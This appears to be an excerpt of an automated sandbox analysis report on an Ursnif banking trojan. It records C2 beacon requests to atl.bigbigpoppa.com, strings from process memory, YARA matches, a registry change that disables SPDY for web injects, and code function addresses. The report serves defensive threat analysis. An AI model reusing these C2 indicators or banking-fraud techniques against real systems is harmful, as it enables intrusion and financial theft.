                    Source: global trafficHTTP traffic detected: GET /KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: Joe Sandbox ViewASN Name: SPRINTHOSTRU SPRINTHOSTRU
                    Source: Joe Sandbox ViewIP Address: 185.251.90.253 185.251.90.253
                    Source: rundll32.exe, 00000015.00000003.618180759.00000000008E3000.00000004.00000001.sdmpString found in binary or memory: http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6P
                    Source: rundll32.exe, 00000015.00000002.737109785.000000000088A000.00000004.00000020.sdmpString found in binary or memory: http://atl.bigbigpoppa.com/t
                    Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                    Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                    Source: powershell.exe, 0000001F.00000003.646082530.00000217679BC000.00000004.00000001.sdmpString found in binary or memory: http://crl.m5
                    Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                    Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 0000001F.00000002.742877071.000002174F421000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 0000001F.00000003.643291434.0000021767840000.00000004.00000001.sdmpString found in binary or memory: http://www.microsoft.co
                    Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: unknownDNS traffic detected: queries for: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR
                    Source: Yara matchFile source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, type: MEMORY

                    E-Banking Fraud:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR
                    Source: Yara matchFile source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, type: MEMORY
                    Disables SPDY (HTTP compression, likely to perform web injects)Show sources
                    Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00E53276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                    System Summary:

                    barindex
                    Writes registry values via WMIShow sources
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00E5725F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00E57E30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00E51754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05593570
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05575C88
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_055710E6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_055790A1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05587B5D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05584B1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_055843B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0557FBA9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0557423D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_0558DAED
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_055952A0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3EE95C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3FB948
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3FB230
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F06B4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F6EA0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E6684
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3D76F4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F5ED8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3EC6C4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E2EC0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F2EF8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E559C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E1DF4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F4DE0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E5DBC
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3D3610
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3D74A4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E4484
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E9500
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3D4B60
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F4354
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3D1348
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E8340
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3FA3A4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F4BA0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3DABDC
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F9408
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F3400
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3EBA74
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3D9AD8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3ED328
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F730C
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F5164
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E1164
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E4150
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3D0000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3D2138
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3EA9F8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E70C8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3F88B8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E0124
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3D90FC
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F404796
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3EF7B4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3EA790
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3E7820
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_000002174F3D1000
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000DB948
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000CE95C
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000DB230
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000D3400
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000B1000
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C7820
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000D88B8
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C70C8
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000B90FC
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C0124
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000B2138
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C6944
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C4150
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000C1164
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000D5164
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000CA9F8
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000CBA74
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000B9AD8
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000D730C
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000CD328
                    Source: C:\Windows\System32\control.exeCode function: 38_2_000B1348